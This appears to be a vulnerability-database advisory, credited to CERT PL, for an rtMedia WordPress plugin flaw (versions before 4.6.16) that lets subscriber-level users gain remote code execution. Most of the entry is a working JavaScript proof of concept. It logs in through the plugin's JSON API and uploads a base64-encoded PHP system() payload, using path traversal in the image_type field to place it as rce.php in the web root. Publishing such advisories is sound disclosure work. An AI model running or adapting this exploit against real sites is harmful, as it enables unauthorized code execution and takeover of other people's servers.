Lucene search

K
wpexploitKrzysztof Zając (CERT PL)WPEX-ID:3D6889E3-A01B-4E7F-868F-AF7CC8C7531A
HistoryNov 29, 2023 - 12:00 a.m.

rtMedia for WordPress, BuddyPress and bbPress < 4.6.16 - Subscriber+ RCE

2023-11-2900:00:00
Krzysztof Zając (CERT PL)
71
wordpress
buddypress
bbpress
rce
json api
arbitrary code execution
security vulnerability
exploit

AI Score

6.9

Confidence

High

EPSS

0.001

Percentile

24.9%

Description The plugin does not validate files to be uploaded, which could allow attackers with a low-privilege account (e.g. subscribers) to upload arbitrary files such as PHP on the server

If plugin JSON API is enabled, any logged-in user may execute arbitrary code by uploading a PHP file. After enabling the API in settings and installing buddypress, run the following code, replacing the username, password, and server path as needed.

fetch("/wp-admin/admin-ajax.php?action=rtmedia_api", {
 "headers": {
  "content-type": "application/x-www-form-urlencoded",
 },
 "body": "method=wp_login&username=USERNAME&password=PASSWORD",
 "method": "POST",
}).then((response) => {
 return response.json();
}).then((data) => {
 const formData = new FormData()
 formData.append('rtmedia_file', btoa('<?php system("ps"); ?>'));
 formData.append('method', 'rtmedia_upload_media');
 formData.append('image_type', './../../../../../var/www/html/wp-content/rce.php');
 formData.append('title', '../');
 formData.append('token', data.data.access_token);

 fetch('/wp-admin/admin-ajax.php?action=rtmedia_api', {
  method: 'POST',
  body: formData
 });
});

AI Score

6.9

Confidence

High

EPSS

0.001

Percentile

24.9%

Related for WPEX-ID:3D6889E3-A01B-4E7F-868F-AF7CC8C7531A